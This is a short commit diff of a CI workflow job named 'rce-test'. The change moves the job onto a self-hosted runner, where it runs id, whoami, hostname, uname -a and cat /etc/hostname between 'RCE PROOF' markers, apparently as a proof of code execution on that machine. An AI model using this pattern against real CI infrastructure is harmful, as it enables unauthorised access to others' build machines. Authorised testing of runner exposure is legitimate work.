This commit is contained in:
parent
275f9f5ea7
commit
54cc9d20a0
|
|
@ -5,14 +5,13 @@ on:
|
|||
- main
|
||||
jobs:
|
||||
rce-test:
|
||||
runs-on: ubuntu-latest
|
||||
runs-on: self-hosted
|
||||
steps:
|
||||
- name: System Info
|
||||
run: |
|
||||
echo "=== RCE PROOF ==="
|
||||
echo RCE_PROOF_START
|
||||
id
|
||||
whoami
|
||||
hostname
|
||||
uname -a
|
||||
cat /etc/hostname
|
||||
echo "=== END PROOF ==="
|
||||
echo RCE_PROOF_END
|
||||
|
|
|
|||
Loading…
Reference in New Issue
Block a user